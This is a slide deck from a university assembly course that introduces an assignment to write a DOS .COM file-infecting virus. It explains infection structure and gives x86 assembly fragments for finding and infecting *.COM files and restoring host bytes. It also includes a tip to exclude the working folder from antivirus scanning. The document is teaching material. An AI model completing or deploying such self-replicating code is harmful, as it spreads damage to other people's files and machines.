Assignment 4 Introduction
Assembly TA Wei-Yen Day
Computer Virus Basic
• A program attaches itself to another program
• Reproduces itself
• Executed later and create more copies
– 1.COM-> 2.COM 3.COM …
• It can certainly dig into your computer and do things you don’t want
Structure of Virus
• 2 basic routine!
– Search
– Copy itself
• More routine are a bit more complex
– Anti-detection
– Anti-anti-virus
Virus Classification
• According to the types of programs they infect
– They may infect COM, EXE, or SYS files
• Note that a virus can be written to infect any kind of code
– C, Basic, a batch file, a Paradox or Dbase program
COM File Structure
• When one enters the name of program,
– DOS begins looking for COM, EXE, and BAT
• COM files are much simpler
– They have predefined segment format
– EXE files’ format are defined by programmer
– COM file is a direct binary image of what should be put into memory and executed by CPU
Assignment 4: Justin Virus
Goal
• Infect all .COM programs under the same folder and print some mischievous lines
Overview
Virus Symbol
• Retain 5 bytes– 3 bytes for jmp
– 2 bytes for mark of virus
• Infect a ?? program when the virus is executed– nop
– nop
– nop
– nop
– nop
More About Virus
Checking Memory
• Compute the size from normal program to “here”
• Actually program size
– We call it “si”
– pop si ;si is p1+p2
– sub si, offset here ;then si is p2
• All the memory address about virus should add “si”
Recover Original Program
• Due to the first execution, we should add 5 nop to allocate space (see p.7)
• Recover original program to memory (P1)– mov ax, word ptr ds:FIRST_5_BYTE[si]
– mov ds:[100h], ax
– mov ax, word ptr ds:FIRST_5_BYTE[si+2]
– mov ds:[100h+2], ax
– mov al, word ptr ds:FIRST_5_BYTE[si+4]
– mov ds:[100h+4], al
Write Back P1
Print Mischievous Word
• Print some mischievous words
• When the infected file is executed, it would print the words virus produced first
• Infect others
Search Next File(1)
• FIND_FILE– mov dx,OFFSET COM_MASK ;search for COM files
– mov ah,4EH ;DOS find first file function
– xor cx,cx ;CX holds all file attributes
• FIND_LOOP– int 21h
– jc FIND_EXIT ;Exit if no files found
– call FILE_OK ;file OK to infect?
– jc FIND_NEXT ;nope, look for another
Search Next File (2)
• FIND_EXIT
– ret ;else return with z set
• FIND_NEXT
– mov ah,4FH ;DOS find next file function
– jmp FIND_LOOP ;Try finding another file
• COM_MASK BYTE '*.COM',0
• FILE_OK
– Check if the virus pattern exist
File OK, Infect It
• Back up the first 5 bytes from original program
• Copy virus itself to the program
• Move the pointer to head, and write first 5 bytes
– Write v1
– 3 bytes are jmp
– 2 bytes are pattern
• Infect next file
The Infecting Mission is Done!
• Let’s take a over view again:
• 1. Check Memory (store p2 size)
• 2. Recover original program
• 3. Print Lines
• 4. Search File to Infect
• 5. Infect it
• 6. Loop 3. 4.
• 7. If no file cab be infected, then the mission completed
Procedure of Justin
DEMO
Assignment 4 Note
• The .COM files (files your virus must infect) is here
– http://wyday.csie.ntu.edu.tw/good_com.zip
• When you compile your code to produce a virus, the anti-virus software in your computer might alert
– Try to set your anti-virus software to not detect the folder your virus is in
Checking Scenario
• The following is the judgment of assignment 4:– If your virus can infect a .COM file (copy itself to
attach another), you can get basic score– If your virus can infect all .COM files under the same
folder, you can get a better score– If your virus can infect all .COM files under the same
folder, and when you open the infected file, it infects all other files, you get a nice score
• If your virus can do all of above, and can avoid infecting files repeatedly, you do a good job!– If your virus crash my computer, I would …
Now it’s your turn!
• Don’t just copy my code, think about it at first
• Actually it’s a simple virus, and it’s an easy work
• If you have any problem, google it! XD
• You can also discuss with me for sure
• Good luck to you guys!